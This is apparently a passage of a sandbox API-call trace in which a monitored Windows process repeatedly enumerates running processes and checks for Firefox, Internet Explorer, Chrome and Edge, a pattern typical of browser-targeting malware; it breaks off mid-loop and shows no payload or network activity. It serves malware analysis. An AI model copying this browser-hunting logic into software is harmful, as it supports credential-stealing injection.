[0211.525] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0211.525] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0211.525] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.525] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0211.526] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0211.526] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0211.526] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0211.526] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.526] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0211.526] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0211.526] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0211.526] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0211.527] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.527] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0211.527] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0211.527] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0211.527] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0211.527] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.527] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0211.528] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0211.528] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0211.528] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0211.528] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.528] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0211.528] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0211.528] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0211.528] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0211.528] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.528] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0211.529] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0211.529] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0211.529] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0211.529] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.529] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0211.529] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0211.529] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0211.529] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0211.529] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.529] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0211.530] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0211.530] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0211.530] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0211.530] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.530] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.530] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0211.530] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0211.530] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0211.531] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.531] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0211.531] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0211.531] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0211.531] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0211.531] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.531] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.532] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0211.532] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0211.532] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0211.532] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.532] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0211.532] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0211.532] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0211.532] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0211.532] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.532] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.533] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0211.533] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0211.533] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0211.533] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.533] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.533] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0211.533] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0211.533] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0211.533] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.533] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0211.534] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0211.534] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0211.534] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0211.534] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.534] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0211.605] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0211.605] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0211.605] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0211.605] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.605] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.605] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0211.605] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0211.605] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0211.605] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.605] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.606] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0211.606] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0211.606] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0211.606] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.606] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.606] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0211.606] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0211.606] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0211.606] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.606] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.607] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0211.607] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0211.607] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0211.607] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.607] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0211.608] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0211.608] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0211.608] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0211.608] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0211.608] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0211.608] CloseHandle (hObject=0xd4) returned 1 [0211.608] Sleep (dwMilliseconds=0x3e8) [0212.684] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0212.687] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.687] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0212.687] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0212.687] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0212.687] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0212.687] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0212.688] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0212.688] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0212.688] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0212.688] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0212.688] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0212.688] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0212.688] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0212.688] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0212.689] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.689] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.689] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0212.689] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0212.689] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0212.689] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.689] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0212.690] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0212.690] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0212.690] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0212.690] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.690] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.690] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0212.690] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0212.690] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0212.690] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.690] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0212.691] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0212.691] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0212.691] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0212.691] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.691] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0212.691] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0212.691] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0212.691] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0212.691] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.691] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0212.692] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0212.692] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0212.692] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0212.692] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.692] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0212.693] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0212.693] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0212.693] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0212.693] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.693] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.693] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0212.693] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0212.693] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0212.693] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.693] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.694] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0212.694] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0212.694] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0212.694] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.694] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.694] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0212.694] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0212.694] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0212.694] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.694] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.695] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0212.695] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0212.695] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0212.695] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.695] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.695] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0212.696] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0212.696] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0212.696] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.696] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0212.696] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0212.696] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0212.696] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0212.696] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.696] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.697] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0212.697] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0212.697] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0212.697] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.697] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.697] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0212.697] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0212.697] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0212.697] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.697] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0212.698] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0212.698] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0212.698] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 